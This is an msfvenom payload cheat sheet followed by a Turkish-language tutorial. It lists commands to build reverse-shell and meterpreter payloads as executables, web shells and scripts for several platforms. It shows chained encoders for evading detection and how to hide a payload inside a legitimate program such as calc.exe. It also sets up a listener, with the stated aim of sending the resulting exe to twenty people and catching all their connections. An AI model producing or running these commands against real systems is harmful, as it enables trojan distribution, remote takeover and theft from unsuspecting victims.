List Payloads
=============

msfvenom -l

Binaries Linux
=============

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows
=======

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac
===
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads PHP
================

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
===

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP
===

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR
===

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war



Scripting Payloads Python
=========================

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash
===

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl
====

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

----------------------------------------------------------------------------------
----------------------------------------------------------------------------------

Linux Based Shellcode
======================

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

Windows Based Shellcode
========================

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

Mac Based Shellcode
====================

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f


----------------------------------------------------------------------------------
----------------------------------------------------------------------------------

MSFVENUM TUTORIALS
==================

“msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f raw -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -e x86/countdown -i 5 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 20 -f exe -o /root/Desktop/eyup2.exe”

multiple encoding => 10 iterasyonluk shikata_ga_nai üzerine 5 iterasyonluk coutdown ve onunda üzerine 20 iterasyonluk shikata_ga_nai yapıldı.

Parametre AdıÖrnek Kullanımı-pmfvenom’da kullanılacak bir payload’u seçer. msfvenom -p “payload adı"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443

-l Payloadları listeler. msfvenom -l “payload, encoder, nops adı”
msfvenom -l payloads veya msfvenom -l encoders

-f Kaydedilecek dosya formatı. msfvenom -f “çıktı formatı”
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe

-a Oluşturulacak payload’un mimarisini belirler. Msfvenom -a “mimari”
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86

--platformDosyanın çalışacağı platformu belirler. msfvenom --platform “çalışacağı platform”
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86 --platform windows

-o Payload’un nereye çıkarılacağını belirtir. msfvenom -o “çıkarılacak dizin”
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86 -o /root/Desktop/eyup.exe

-e Encoder seçimini belirtir. msfvenom -e “encoder adı”
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86 -o /root/Desktop/eyup.exe -e x86/shikata_ga_nai

-i İterasyon sayısını belirler yani encoding işleminin kaç kere tekrarlanacağını bildirir. msfvenom -i 20
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86 -o /root/Desktop/eyup.exe -e x86/shikata_ga_nai -i 20

-b Kötü karakterleri (bad characters) temizler. “msfvenom -b ‘\x00\xff’”
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86 -o /root/Desktop/eyup.exe -e x86/shikata_ga_nai -i 20 -b ‘\x00’

-x Oluşturulacak payload’un bir dosya ile birleştirileceğini belirtir. msfvenom -x “birleştirilecek dosyanın adı veya yolu”
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86 -o /root/Desktop/eyup.exe -e x86/shikata_ga_nai -i 20 -b ‘\x00’ -x /root/Desktop/calc.exe

-k Birleştirilen dosyanın fonksiyonlarının bozulmasını engelle “msfvenom -k”
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -f exe -a x86 -o /root/Desktop/eyup.exe -e x86/shikata_ga_nai -i 20 -b ‘\x00’ -x /root/Desktop/calc.exe -k

-c Birleştirilecek Shell code’u belirler. msfvenom -c “Shell code dizini”
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.141 LPORT=443 -c /root/Desktop/shellcode.txt

Tablo: Msfvenom Parametreleri
Üstteki tabloda görüleceği üzere Msfvenom oldukça rahat ve kolay bir kullanıma sahiptir.
Aşağıdaki tabloda ise msfvenom’un çıktı formatları yer almaktadır.

Çıktı TipiÇıktı ListesiÇalıştırılabilirasp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, warYazılımsalbash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscriptTablo: Msfvenom Çıktı Formatları

Msfvenom bir çok çıktı formatını desteklediği gibi, bir çok platformu da desteklemektedir.
Msfvenom’un payload çıktısının çalışabileceği platformlar ise aşağıdaki gibidir.

Çıktı TipiPlatform ListesiÇalıştırılabilirosx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, solaris, cisco, linux, ruby, java, android, netware, windows

set ExitOnSession falseKaç bağlantı gelirse gelsin, yeni bağlantıların gelmesi için bu değeri false konumuna alıyoruz. 
Örnek ile açıklamam gerekirse eğer; “oluşturduğumuz exe yi 20 kişiye göndereceğimizi varsayalım. 
Normal şartlar altında (yani varsayılanda) eğer bu değeri değiştirmezsek, 
ilk bağlantı geldikten sonra diğer 19 kişi bizimle bağlantı kuramayacaktır. 
Böyle bir sorun olmasın diyorsak bu değeri false yapmamız gerekiyor.
”exploit -j -z Listen moda geçip bağlantılar için bir jobs belirledik. 
Bundan sonra gelen tüm bağlantıları jobs karşılayacaktır.
